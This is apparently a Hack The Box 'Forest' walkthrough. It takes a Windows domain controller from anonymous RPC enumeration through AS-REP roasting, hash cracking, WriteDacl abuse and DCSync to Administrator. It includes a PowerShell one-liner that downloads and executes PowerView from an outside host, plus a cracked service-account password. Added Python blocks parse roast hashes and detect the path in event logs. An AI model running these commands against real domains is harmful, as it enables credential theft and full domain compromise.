Basic information

Port scan

Windows domain server:

$ nmap -sC -sV 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-10 13:27 CST
Nmap scan report for 10.10.10.161
Host is up (0.068s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-11-10 05:34:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h46m50s, deviation: 4h37m09s, median: 6m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-11-09T21:34:54-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-11-10T05:34:51
|_ start_date: 2020-11-10T03:18:44

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.57 seconds

rpcclient

RPC accepts anonymous logins, so we can enumerate information:

rpcclient -U "" 10.10.10.161
Enter WORKGROUP\'s password:
rpcclient $>

enumdomusers

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[wasim] rid:[0x1db1]

users

Extract the user names to use as a wordlist:

Administrator
sebastien
lucinda
svc-alfresco
andy
mark
santi
wasim

GetNPUsers

Run GetNPUsers against the user list collected above; if a hash comes back for an account, that account can be AS-REP Roasted:

for user in $(cat users.txt);do python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb.local/${user};done
...
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:0d853aa9ac40a229135644f5fc9c50c4$52bf89e2f77cb3e0a78dbe00bb3051b6e52488c2b2f090d5d22b768c6f1180fe5ad3b07fdd91497579bb0e6c24933f6dab51e92ffa94b380df3725326e27ea03bacad08192bf6e15ecabe6cc79ec3d38f05cf64235c8c3d5d5c1c6bd160db3e3a9e70520e2546c8627b344208ce05d65622f9bc1afdb0784282de0c6fc2523ad8a4c18f673a00fda94c706534fca8124069f9dfca7aabb6419b29afd8227e917caf5f5414ec87740b90f0c1a4e4e20f6c1e196115696bb52a096b3e2484fe04f5d266743a96ed4173baa36d1cd1412c945573ad0d53d1f74e068cdbebc04da3aa11ea8b53ebc
Impacket v0.9.22.dev1+20201105.154342.d7ed8dba - Copyright 2020 SecureAuth Corporation
...

john

Crack the hash to recover the svc-alfresco account password:

➜  Forest sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
...

s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

...
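Added example (Python, not from the original writeup) covering the two facts behind the GetNPUsers and john steps above: the fields of the `$krb5asrep$` line, whose etype 23 (RC4-HMAC, keyed from the unsalted NT hash) is what makes offline cracking cheap, and the userAccountControl bit (DONT_REQ_PREAUTH, 0x400000) that makes the KDC hand out such a hash in the first place. The directory records and the hash material are constructed, not real htb.local data.

```python
import re

# AS-REP roast line as printed by GetNPUsers (see the output above):
#   $krb5asrep$<etype>$<user>@<REALM>:<checksum-hex>$<encrypted-part-hex>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Kerberos encryption types relevant to roasting.
ETYPES = {17: "AES128-CTS-HMAC-SHA1-96", 18: "AES256-CTS-HMAC-SHA1-96", 23: "RC4-HMAC"}


def parse_asrep_hash(line):
    """Split an AS-REP roast hash into its fields; return None if the line is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype"))
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "etype": etype,
        "etype_name": ETYPES.get(etype, "unknown"),
        # etype 23 keys derive from the NT hash (unsalted MD4): fast to crack offline
        "weak_cipher": etype == 23,
        "edata_bytes": len(m.group("edata")) // 2,
    }


# userAccountControl bit that makes an account roastable: the KDC returns an AS-REP
# encrypted with the user's key without first demanding pre-authentication.
DONT_REQ_PREAUTH = 0x400000


def accounts_without_preauth(records):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(r["sAMAccountName"] for r in records
                  if r["userAccountControl"] & DONT_REQ_PREAUTH)


# Constructed sample directory records (flag values are illustrative, not from the box).
SAMPLE_RECORDS = [
    {"sAMAccountName": "sebastien",    "userAccountControl": 0x10200},   # NORMAL_ACCOUNT|DONT_EXPIRE_PASSWORD
    {"sAMAccountName": "svc-alfresco", "userAccountControl": 0x410200},  # same plus DONT_REQ_PREAUTH
    {"sAMAccountName": "andy",         "userAccountControl": 0x200},     # NORMAL_ACCOUNT
]

if __name__ == "__main__":
    sample = "$krb5asrep$23$svc-alfresco@HTB.LOCAL:" + "0d" * 16 + "$" + "ab" * 40  # constructed
    print(parse_asrep_hash(sample))
    print(accounts_without_preauth(SAMPLE_RECORDS))
```

Clearing the bit (or enforcing AES-only Kerberos on the account) removes the hash john was able to crack here.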

user flag

Port 5985 is open, so we can log in directly over WinRM and find user.txt on the desktop:

BloodHound

Next, collect information with BloodHound and analyze the attack path to Domain Admins:

Upload the collector, run it, download the results, and import them locally for analysis:

Privilege escalation

Exchange Windows Permissions

First, the account has to be added to the Exchange Windows Permissions group:

net group "Exchange Windows Permissions" svc-alfresco /add /domain

The Exchange Windows Permissions group then has WriteDacl rights:

WriteDacl

Abusing this right lets us grant ourselves DCSync; PowerView has to be imported first:

The change is cleaned up automatically, so the steps are combined into one line and executed together:

iex(new-object net.webclient).downloadstring('http://10.10.14.3:9999/PowerView.ps1')

Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

DCSync

Now we can run DCSync as svc-alfresco and obtain the hashes:
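Added example (Python, not part of the writeup) of the detection side of the path above: each step leaves a Windows Security event (4728/4732 for the group add, 5136 for the nTSecurityDescriptor write on the domain head when the DCSync right is granted, 4662 carrying the replication control-access GUIDs for the DCSync itself), and a 4662 with those GUIDs from anything other than a domain controller's computer account is the signal. The events are constructed, FOREST$ stands in for the DC computer account, and 5136 only appears if Directory Service Changes auditing is enabled on the domain object.

```python
# Replication control-access-right GUIDs seen in the "Properties" field of
# Event 4662 when an account pulls directory data the way DCSync does.
DS_REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Groups whose membership changes deserve an alert; Exchange Windows Permissions
# is here because of the WriteDacl on the domain object abused above.
WATCHED_GROUPS = {"exchange windows permissions", "domain admins", "enterprise admins"}


def triage(events, dc_accounts):
    """Return (kind, actor, detail, target) tuples for the three steps of the path."""
    alerts = []
    for e in events:
        eid, actor = e["EventID"], e["SubjectUserName"]
        if eid in (4728, 4732) and e["TargetUserName"].lower() in WATCHED_GROUPS:
            # 4728/4732: member added to a security-enabled global/local group
            alerts.append(("GROUP_ADD", actor, e["MemberName"], e["TargetUserName"]))
        elif eid == 5136 and e["AttributeLDAPDisplayName"] == "nTSecurityDescriptor":
            # 5136: directory object modified; a new ACE on the domain head is how
            # the replication rights get granted to a user account
            alerts.append(("ACL_CHANGE", actor, e["ObjectDN"], None))
        elif eid == 4662 and actor.lower() not in dc_accounts:
            # 4662 with replication GUIDs from anything but a DC computer account
            hits = [n for g, n in DS_REPL_GUIDS.items() if g in e["Properties"].lower()]
            if hits:
                alerts.append(("DCSYNC", actor, ",".join(sorted(hits)), e["ObjectName"]))
    return alerts


# Constructed Security-log events (field names follow the Windows event XML; values are made up).
DC_ACCOUNTS = {"forest$"}
SAMPLE_EVENTS = [
    {"EventID": 4732, "SubjectUserName": "svc-alfresco", "MemberName": "svc-alfresco",
     "TargetUserName": "Exchange Windows Permissions"},
    {"EventID": 5136, "SubjectUserName": "svc-alfresco", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"},  # normal DC replication
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 "
                   "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(alert)
```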

root flag

Then log in as Administrator directly with the hash and find root.txt on the desktop:

References